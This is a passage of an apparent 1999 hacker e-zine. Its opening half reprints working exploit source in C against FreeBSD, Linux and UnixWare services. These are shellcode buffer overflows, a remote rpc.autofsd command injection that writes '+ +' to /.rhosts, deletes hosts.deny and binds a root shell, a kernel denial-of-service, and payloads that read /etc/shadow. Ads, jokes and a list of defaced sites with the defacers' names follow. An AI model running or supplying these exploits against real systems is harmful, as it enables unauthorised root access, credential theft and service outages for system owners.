CMSD_PROG, CMSD_VERS, "udp"); if (cl == NULL) { clnt_pcreateerror("clnt_create"); printf("exploit failed; unable to contact RPC server\n"); exit(1); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send, xdr_cm_reply, (caddr_t) &reply, tm); if (stat == RPC_SUCCESS) { printf("exploit failed; RPC succeeded and returned %d\n", reply.i); clnt_destroy(cl); exit(1); } else { clnt_perror(cl, "clnt_call"); printf("exploit probably worked; RPC failure was expected\n"); clnt_destroy(cl); exit(0); } } /* www.hack.co.za */ @HWA 40.0 xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * xsoldier exploit for Freebsd-3.3-RELEASE * Drops a suid root shell in /bin/sh * Brock Tellier btellier@usa.net */ #include char shell[]= /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; char cc[100]; fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4400; char buf[bsize]; int eip = 0xbfbfdb65; /* works for me */ buildui(); if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n"); fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4325; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); } /* www.hack.co.za */ @HWA 41.0 rpc.autofsd.c FreeBSD/misc remote exploit by guidob. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ // *** Synnergy Networks // * Description: // // Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell // on tcp port 530. // * Author: // // guidob (guidob@synnergy.net) // Synnergy Networks (c) 1999, http://www.synnergy.net // * Greets: // // Synnergy Networks, LoU, Cindy // * Comments: // // This will not work on all types and/or versions. // *** Synnergy Networks #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define AUTOFS_PROG ((u_long)100099) #define AUTOFS_VERS ((u_long)1) #define AUTOFS_MOUNT ((u_long)1) #define AT 8 #define A_MAXNAME 255 #define A_MAXOPTS 255 #define A_MAXPATH 1024 struct mntrequest { char *name; /* name to be looked up */ char *map; /* map to use */ char *opts; /* default options */ char *path; /* mountpoint to use */ }; struct mntres { int status; /* 0=OK, otherwise an errno from */ }; bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){ if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE); if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE); return (TRUE); } void signal_handler(void) { exit(0); } bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){ if (!xdr_int(xdrs, &objp->status)) return (FALSE); return (TRUE); } main(int argc, char **argv){ CLIENT *cl; struct mntrequest mntreq; struct mntres *res; struct sockaddr_in target; struct hostent *hp; struct timeval tm; char *host; enum clnt_stat stat; int sd; signal(SIGALRM, signal_handler); alarm(AT); host=argv[1]; if ((target.sin_addr.s_addr = inet_addr(host)) == -1) { if ((hp = gethostbyname(host)) == NULL) { printf("%s: cannot resolve\n", host); exit(1); } else target.sin_addr.s_addr = *(u_long *)hp->h_addr; } target.sin_family=AF_INET; target.sin_port=0; sd=RPC_ANYSOCK; tm.tv_sec=8; tm.tv_usec=0; if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) { clnt_pcreateerror("clnt_create"); exit(0); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); tm.tv_sec = 25; /* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob */ mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* Tu mozna wstawic co sie chce */ mntreq.map="/bin/true"; mntreq.path="/hosts"; mntreq.opts=""; bzero((char *)&res, sizeof(res)); if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq, (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) { clnt_perror(cl, "clnt_call"); exit(1); } clnt_destroy(cl); } // EOF @HWA 42.0 iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* Exploit option length missing checks in: Debian Linux 2.1 RedHat Linux 5.2 Linux kernel 2.0.38 Linux kernel 2.0.37 Linux kernel 2.0.36 Linux kernel 2.0.35 Linux kernel 2.0 Andrea Arcangeli */ #include #include #include #include main() { int sk; struct sockaddr_in sin; struct hostent * hostent; #define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr)) #define OPT_SIZE 1 char payload[PAYLOAD_SIZE]; sk = socket(AF_INET, SOCK_DGRAM, 0); if (sk < 0) perror("socket"), exit(1); if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0) perror("setsockopt"), exit(1); bzero((char *)&sin, sizeof(sin)); sin.sin_port = htons(0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = htonl(2130706433); if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0) perror("connect"), exit(1); if (write(sk, payload, PAYLOAD_SIZE) < 0) perror("write"), exit(1); } /* www.hack.co.za */ @HWA 43.0 truck.c UnixWare 7.1 local explot by Brock Tellier. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /** ** "Its a hole you could drive a truck through." ** -Aleph One ** ** truck.c UnixWare 7.1 security model exploit ** Demonstrates how we own privileged processes ** ** Usage: cc -o truck truck.c ** ./truck where filetype is 1, 2 or 3 ** (for dacread, dacwrite and setuid, respectively) ** ** This will put $XNEC in the environment and run a shell. ** From there you must use gdb/debug to load a file of the ** type you chose (by checking /etc/security/tcb/privs) ** and setting a breakpoint at _init via "break _init". ** When you "run" and break at _init, change your EIP ** to something between 0x8046000 and 0x8048000 with ** "set $eip = 0x8046b75" and "continue" twice. ** ** ** Brock Tellier btellier@usa.net **/ #include #include char scoshell[]= /* This isn't a buffer overflow! really! */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define LEN 3500 #define NOP 0x90 #define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \ /.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \ \"); }\n" #define DACREAD "void main() { system(\"cat /etc/shadow\");}\n" #define SETUID "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n" void usage(int ftype) { fprintf(stderr, "Error: Usage: truck [filetype]\n"); fprintf(stderr, "Where filetype is one of the following: \n"); fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n"); fprintf(stderr, "Note: if file has allprivs, use setuid\n"); } void buildsm(int ftype) { FILE *fp; char cc[100]; fp = fopen("/tmp/sm.c", "w"); if (ftype == 1) fprintf(fp, DACREAD); else if(ftype == 2) fprintf(fp, DACWRITE); else if(ftype == 3) fprintf(fp, SETUID); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c"); system(cc); } int main(int argc, char *argv[]) { int i; int buflen = LEN; char buf[LEN]; int filetype = 0; char filebuf[20]; if(argc > 2 || argc == 1) { usage(filetype); exit(0); } if ( argc > 1 ) filetype=atoi(argv[1]); if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); } buildsm(filetype); fprintf(stderr, "\nUnixWare 7.1 security model exploit\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); memset(buf,NOP,buflen); memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); memcpy(buf, "XNEC=", 5); putenv(buf); buf[buflen - 1] = 0; system("/bin/sh"); exit(0); } /* www.hack.co.za */ @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE http://revenger.hypermart.net ±±± ±±±±± ± ± ±±±±±±± ±± ± ±±±±±± ±±±±± ±±± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ±± ± ± ± ±± ±±± ± ± ±±±±±±± ± ± ± ± ±±± ±± ± ± ± ± ± ± ± ± ± ± ±±± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ±±±±± ± ±±±±±±± ± ±± ±±± ±±±±± ± ± 's T E X T Z F I L E HOMEPAGE http://revenger.hypermart.net Here you may find up to 340 text files for: ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS , UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC , PHREAKING , BOOKS AND A-S FILES AVAILABLE! http://revenger.hypermart.net Visit Us Now ! . . ............... . : : . . . . . . __:________ : : ___________ . . . \ < /_____:___ : ( < __( :_______ ) : )______:___\_ (___( : / =====/________|_________/ < | : (________________(====== : (__________________) :wd! . : : : - / - w w w . h a c k u n l i m i t e d . c o m - / - : . . . . . : : . . . . . :...............: . . ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... Submitted by Deflux, check out his site at http://www.advdata.net/~deflux/ Define your terms for software releases: Advanced User: A person who has managed to remove a computer from its packing materials. Power User: A person who has mastered the brightness and contrast controls on any computer monitor. American Made: Assembled in America from parts made abroad. Alpha Test Version: Too buggy to be released to the paying public. Beta Test Version: Still too buggy to be released. Release Version: Alternate pronunciation of "Beta Test Version". Sales Manager: Last week's new sales associate. Consultant: A former sales associate who has mastered at least one tenth of the dBase III Plus Manual. Systems Integrator: A former consultant who understands the term AUTOEXEC.BAT. AUTOEXEC.BAT: A sturdy aluminum or wooden shaft used to coax AT hard disks into performing properly. Backup: The duplicate copy of crucial data that no one bothered to make; used only in the abstract. Clone: One of the many advanced-technology computers IBM is beginning to wish it had built. Convertible: Transformable from a second-rate computer to a first-rate doorstop or paperweight. (Replaces the term "junior".) Copy Protection: A clever method of preventing incompetent pirates from stealing software and legitimate customers from using it. Database Manager: A program that allows users to manipulate data in every conceivable way except the absolutely essential way they conceive of the day after entering 20 megabytes of raw data. EMS: Emergency Medical Service; often summoned in cases of apoplexy induced by attempts to understand extended, expanded, or enhanced memory specs. Encryption: A powerful algorithmic encoding technique employed in the creation of computer manuals. FCC-Certified: Guaranteed not to interfere with radio or television reception until you add the cable that is required to make it work. Hard Disk: A device that allows users to delete vast quantities of data with simple mnemonic commands. Integrated Software: A single product that deftly performs hundreds of functions that the user never needs and awkwardly performs the half-dozen he uses constantly. Laptop: Smaller and lighter than the average breadbox. Multitasking: A clever method of simultaneously slowing down the multitude of computer programs that insist on running too fast. Network: An electronic means of allowing more than one person at a time to corrupt, trash, and otherwise cause permanent damage to useful information. Portable: Smaller and lighter than the average refrigerator. Support: The mailing of advertising literature to customers who have returned a registration card. Transportability: Neither chained to a wall or attached to an alarm system. Printer: An electromechnical paper shredding device. Spreadsheet: A program that gives the user quick and easy access to a wide variety of highly detailed reports based on highly inaccurate assumptions. Thought Processor: An electronic version of the intended outline procedure that thinking people instantly abandon upon graduation from high school. Upgraded: Didn't work the first time. User Friendly: Supplied with a full color manual. Very User Friendly: Supplied with a disk and audiotape so the user need not bother with the full color manual. Version 1.0: Buggier than Maine in June; eats data. Version 1.1: Eats data only occasionally; upgrade is free, to avoid litigation by disgruntled users of Version 1.0. Version 2.0: The version originally planned as the first release, except for a couple of data-eating bugs that just won't seem to go away; no free upgrades or the company would go bankrupt. Version 3.0: The revision in the works when the company goes bankrupt. Videotex: A moribund electronic service offering people the privelege of paying to read the weather on their television screens instead of having Willard Scott read it to them free while they brush their teeth. Warranty: Disclaimer. Workstation: A computer or terminal slavishly linked to a mainframe that does not offer game programs. (The previous list of terms was furnished by copied from the Government Computer News, November 21, 1988 issue. The original data was provided by the WIC Connection.) SITE.1 http://www.temporal.org/thescene/pics/ Wonder who's behind the nick on IRC? or in the scene? check this link out to see some of the more well known people from around irc etc... http://www.hack.co.za/ By: Gov-Boi Recently updated, looks clean, some graphics, not a bad layout, no more text only. always a good site for recent exploits, give it a visit. http://hhp.perlx.com/ By: Loophole Very nice and well done site by an oldschool ninja... can be found on irc but don't harass him or he'll get medeival on your ass!...you can find exploits, advisories and the like here, its a work in progress, brand new site. Looks promising! - Ed http://www.scriptkiddies.org/ Well it had to happen, they even have merchandizing, check it out, more news, tech and otherwise, scene gossip, tips and articles. can u dig it? Note: new site, some stuff isn't setup yet but should be soon...at least it looks sweet. - Ed You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially wsith some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< * Info supplied by the attrition.org mailing list. Listed oldest to most recent... Defaced domain: www.activedev.net Site Title: Active Development Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.activedev.net Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.18, 99.12.15, 99.12.07 by acidklown, pyrostorm666, pyrostorm666 Potentially offensive content on defaced page. Defaced domain: www.chegamais.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.chegamais.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: image1.ouhsc.edu Site Title: University of Oklahoma Health Sciences Center Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/image1.ouhsc.edu Defaced by: relogic Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.allianceenterprises.com Site Title: Alliance Enterprises Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.allianceenterprises.com Defaced by: relogic Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.firstgpa.com Site Title: First American Gropu Purchasing Association Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.firstgpa.com Defaced by: relogic Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.webdr.com Site Title: The WEB Doctor Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.webdr.com Defaced by: relogic Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.benthic.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.benthic.com Defaced by: Wolf Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage) Potentially offensive content on defaced page. Defaced domain: www.teddies4ever.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.teddies4ever.com Defaced by: WKD Operating System: Solaris Defaced domain: www.harp-industries.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.harp-industries. Defaced by: inkk Operating System: Solaris 2.6 - 2.7 Potentially offensive content on defaced page. Defaced domain: www.nsbrasil.org Site Title: Melckzedeck Aquino de Aracjo Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.nsbrasil.org Defaced by: Death Knights Operating System: Linux (Apache 1.3.4) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.alas.net Site Title: Alexandre Simoes Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.alas.net Defaced by: Death Knights Operating System: Linux (Apache 1.3.4) Potentially offensive content on defaced page. Defaced domain: www.thsrock.net Site Title: Trinity High School RockNet Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.thsrock.net Defaced by: Pezzdc Operating System: Windows NT (WebSitePro/2.3.15) Previously defaced on 99.12.16 by f1ber Potentially offensive content on defaced page. Defaced domain: www.cm-lisboa.pt Site Title: Câmara Municipal de Lisboa Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cm-lisboa.pt Defaced by: F0rpaxe Operating System: Windows NT Attrition comment: This is the Web site for the Governor of Lisbon, the capital of Portugal Defaced domain: eagles.eems.giles.k12.va.us Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us Defaced by: verb0 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: games.eesite.com Site Title: Echelon Entertainment Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/games.eesite.com Defaced by: verb0 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page Defaced domain: cardserver.eesite.com Site Title: Echelon Entertainment Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/cardserver.eesite.com Defaced by: verb0 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.itaipu.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.itaipu.gov.br Defaced by: inferno.br Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.torahacademy.org Site Title: MTC Enterprises Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.torahacademy.org Defaced by: unknown Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.19 by f1ber Potentially offensive content on defaced page. Defaced domain: www.smc.com.br Site Title: SMC Internet Services Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.smc.com.br Defaced by: Ass0mbracao Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: sugok.chongju-e.ac.kr Site Title: ChongJu National University of Education Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/sugok.chongju-e.ac.k Defaced by: JvM Operating System: Solaris 2.6 Potentially offensive content on defaced page. Defaced domain: www.map.org Site Title: MAP International Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.map.org Defaced by: unknown Operating System: Solaris 2.6 - 2.7 Previously defaced on by Potentially offensive content on defaced page. Defaced domain: www.arc.gov Site Title: Appalachian Regional Commission Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.arc.gov Defaced by: phiber Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.fairus.org Site Title: FAIR Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.fairus. Defaced by: Ass0mbracao Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.19 99.12.18 by Potentially offensive content on defaced page Defaced domain: facepe.pe.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/facepe.pe.gov.br Defaced by: Shadow Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cisco.net Site Title: Cisco.Net Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cisco.net Defaced by: Digital Domination Operating System: Digital Unix (Apache/1.2.6 FrontPage/3.0.4) Previously defaced on 99.12.19 by DD Potentially offensive content on defaced page. Defaced domain: eagles.eems.giles.k12.va.us Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.21 by Verb0 Potentially offensive content on defaced page. Defaced domain: www.theisp.net Site Title: Discovery Online, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.theisp.net Defaced by: Uneek Tech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.virtualshack.com Site Title: virtualshack.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.virtualshack.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: members.geosoft.org Site Title: The Geosoft Network Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/members.geosoft.org Defaced by: HiP Operating System: Windows NT (Apache 1.3.9 Win32) Potentially offensive content on defaced page. Defaced domain: www.thegolftravelcenter.com Site Title: Randy Young (THEGOLFRAVELCENTER-DOM) Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.thegolftravelcenter.com Defaced by: Ass0mbracao Operating System: NT Previously defaced on 99.12.19 by BLN Potentially offensive content on defaced page. Attrition comment: Also defaced www.smc.com.br Defaced domain: www.contrast-clothing.com Site Title: Contrast Clothing Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.contrast-clothing.com Defaced by: unknown Operating System: NT HIDDEN comments in the HTML. Defaced domain: www.oirm.bia.gov Site Title: Office of Information Resources Management, Bureau of Indian Affairs Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.oirm.bia.gov Defaced by: phiber Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.cya.ca.gov Site Title: California Department of Youth Authority Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cya.ca.gov Defaced by: phiber Operating System: Windows NT Defaced domain: www.irr.bia.gov Site Title: Indian Reservation Roads Program, Bureau of Indian Affairs Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.irr.bia.gov Defaced by: phiber Operating System: Windows NT Defaced domain: www.ocf.anl.gov Site Title: Office of the Chief Financial Officer, Argonne National Labs Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.ocf.anl.gov Defaced by: phiber Operating System: Windows NT Defaced domain: www.calgold.ca.gov Site Title: CalGOLD Business Permits Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.calgold.ca.gov Defaced by: phiber Operating System: Windows NT Defaced domain: www.samaritan.org Site Title: Samaritan's Purse Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.samaritan.org Defaced by: B.L.Z. Bub Operating System: NT HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.zenworksmaster.com Site Title: ZENMaster Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.zenworksmaster.com Defaced by: Ass0mbracao Operating System: NT Previously defaced on 99.12.19 by BLN Potentially offensive content on defaced page. Defaced domain: www.fmc.gov Site Title: Federal Maritime Commission Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.fmc.gov Defaced by: phiber Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: democrats.assembly.ca.gov Site Title: California State Assembly Democratic Caucus Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/democrats.assembly.ca.gov/ Defaced by: phiber Operating System: Windows NT Defaced domain: www.taonline.com Site Title: DI-USA, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.taonline.com Defaced by: Pyrostorm666 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.pitt.ang.af.mil Site Title: Air National Guard Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.pitt.ang.af.mil Defaced by: phiber Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.laredo.k12.tx.us Site Title: Texas K12 Schools Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.laredo.k12.tx.us Defaced by: Ass0mbracao Operating System: Windows NT or WFW 3.11 Previously defaced on 99.12.16 by f1ber Potentially offensive content on defaced page Defaced domain: www.dfi.ca.gov Site Title: State of California Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.dfi.ca.gov Defaced by: phiber Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.h-c-v.org Site Title: HCV Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.h-c-v.org Defaced by: ezoons Operating System: FreeBSD 2.2.1 Potentially offensive content on defaced page. Defaced domain: www.upshq.com Site Title: United Phreaks Syndicate Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.upshq.com Defaced by: MOTHERFUCKER GRANDPA NIGZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cssc.gov Site Title: Customer Systems Support Center Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cssc.gov Defaced by: phiber Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.jcomtraining.com Site Title: JCom Computer Training Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.jcomtraining.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cascades-spa.com Site Title: 2032272 Nova Scotia Ltd Mirror: 